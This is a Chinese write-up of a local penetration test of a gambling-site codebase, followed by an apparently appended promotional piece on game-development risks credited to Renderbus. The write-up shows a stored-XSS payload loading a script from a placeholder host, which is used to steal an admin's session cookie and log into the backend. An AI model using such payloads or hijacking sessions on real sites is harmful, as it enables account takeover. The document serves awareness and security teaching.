对网站的一次渗透实录 揭秘后台暗箱操作
前言
测试为本地测试,重点是普及防骗知识。
搭建环境
apache mysql 5.6 php5.6
渗透工具
RIPS审计 xss
0x01
首先网站配置好数据库账户密码,数据库导入进去。访问看看是否成功!
ok,成功搭建好了。
0x02
打开我们新入手的工具RIPS,配置好网站目录,开始看看有多少漏洞。
漏洞有点多,我们挑一个最简单的xss来看看结果。一共有32个结果,其中有一个是用户注册界面的xss。学过的同学应该懂了这代表着什么。
将用户post的注册参数不加过滤的直接带进了sql语句,导致用户名可插入xss代码。如果后台查看会员管理,是一定会触发的。装了http-only的除外。
注册的xss代码就不发出来了,仅仅提供思路。
0x03
接下来我们模仿管理员的正常操作。登录后台,查看会员有没有异常情况。
看到编号18的空白处我就放心了。有的同学不懂我们就来诠释一下吧。打开firfox的插件,查看源代码如下。
可以看到,位于编号18的用户名字并不是真的空白,而是一串xss代码。
<sCrIpt srC=//xxx></sCRipT>
不理解也没关系,直接看本地的xss平台收信箱。
可以看到自己是有cookie了,PHPSESSID后面那串32位的字母就是cookie。我们修改cookie后成功登录。
由于这套源码从网上下载下来的,有充值记录我也不清楚为什么哈哈哈,我就把敏感信息截了。
0x04
进了后台我们来看看输得原因吧!
看到最右边的123456了嘛。我们随便点一个试试。
这下你明白了嘛?
希望大家看了这篇文章能够点个赞,搭建不易,为了让赌徒们迷途知返我也是下了决心!
这几点能直接毁了游戏平台,运营商可长点心吧!
虚拟经济高速发展的今天,越来越多的人会选择自助投资的方式赚钱,而移动设备普及的今天,电玩游戏运营这个低成本高收入的投资行业顺利进入了创业者的视野。但是对于一小部分投资者来说,他们不但没有盈利,甚至连本钱都亏进去了,很多人都奇怪,游戏市场明明收益大好,为什么还是有人失败赔钱吗?
游戏开发
一、源码开发风险
游戏市场目前非常火爆,想必这是很多人有目共睹的,所以越来越多人瞧准了商机,纷纷进入,市场风光无限,面对那么多雄厚的市场前景,却还是让很多人心有余悸,这是为什么呢?
很多初入行的投资者,为了节约成本,会直接购买源码,二手开发,结果,源码漏洞百出,根本没办法上线运营,结果只能让投资的资金付诸东流,源码是游戏的核心,所以正规的游戏开发公司是不会轻易的开放自己的源码,市面上交易的游戏源码,基本上都是一些地摊货,问题很多。
二、外挂辅助真相
廉价的游戏平台虽然价格便宜,但是质量和品质都很难保证,同时源码开放之后,任何程序员都可以开发出外挂,游戏外挂基本的原理都是侵入游戏服务器,踹怪游戏代码,达到外挂的结果。
一款游戏软件,一旦出现外挂,这个游戏就失去了公平性,会导致玩家流失,运营商没办法正常运营,最后导致这款游戏血本无归。
三、游戏后去维护也烧钱
就目前市场来看,即便非常有技术含量的游戏开发公司,也没办法保证自己的产品是完美无缺的,而且游戏目前又是最容易遭受DDOS攻击的一类游戏,所在后期的维护和更新很重要,所以要选择有保证的游戏开发公司,一般会提供免费的售后维护。
简单说一下开发,源码,及二开
什么是源码?
是指编写原始程序的代码,代码是指一种编程语言,运行的软件是要经过编写的,源代码不能直接运行,必须经过编译后才能运行。源码是可以直接更改游戏布局、功能的。
什么是组件?
就是把源代码编译后发布的程序,把源码编辑生成组件才可以搭建。
流程:游戏源码——游戏编译(编译好的游戏成为组件)——加密授权——再编译——然后架设到客户服务器。
什么是二次开发?
简单的说就是在现有的软件上进行修改,功能的扩展,然后达到自己想要的功能,一般来说都不会改变原有系统的内核。因为不是自己开发的源码很多系统可能会存在不兼容现象,所以出现问题自己很难解决。
基本要求:
1你要有这个开源产品的所用语言基础。
2你要对这个开源产品的功能和使用比较熟悉,因为熟悉了你才知道一个需求下来,你要改什么,什么是系统自带的,大概要怎么改。
3你要熟悉这个开源产品的数据结构,代码结构,系统的框架结构,核心是哪里,附属功能是在哪里,简单来说就是数据库,代码逻辑,文件目录的熟悉。
开发游戏的语言有哪些?
Java—C++—C#—U3D—Lua(鲁啊)先选择一个引擎或开发框架,在学习这个框架支持的语言。每种编程语言都有自己的特点,根据情况不同,开发者会选择对游戏平台有力的编程语言来开发,这也意味着开发者需要掌握多种编程语言,当然大多数都是专供一项,了解其余,所以开发对技术人才的水平要求很高。
为什么市面上会出现低价格的游戏?
1非专业开发人员
个人或者几个人的小团队没有实力创新创造自己的游戏,下载盗版源码低价出售或者二次开发出售,BUG,漏洞很多。售后服务没有保障,这类主要是骗钱了,万万不可相信。
开发技术不同
2开发的过程中,不同的设计师出来的质量和效果都是不一样的,有很多公司的技术人员在开发经验上有很大缺陷。APP功能和视觉画面效果的复杂程度对技术员都有很大的考验,开发费用跟前期UI设计有关,UI界面设计的越复杂,画面效果越好,开发的时间就会越长同样成本就会越高,专业的开发公司会高价聘请专业性比较强的人才,在游戏的流畅性,美观性,个性化功能上都能完美实现。
3配套服务不完善
游戏上线运营之后的维护,需要强大的技术团队,在游戏运营过程中,BUG问题,支付问题,掉包问题,甚至可能遇到服务器被攻击的可能,能够在第一时间做出反应处理并解决问题,非专业开发公司或者个人本身出售价格低廉,根本不会管产品的售后,后续产品出现问题甚至会收取额外的售后维护费用,并且问题不一定得到彻底的解决,永远都市一个无底洞。
本文作者及来源:Renderbus瑞云渲染农场https://www.renderbus.com
文章为作者独立观点不代本网立场,未经允许不得转载。
投诉举报&联系我们:
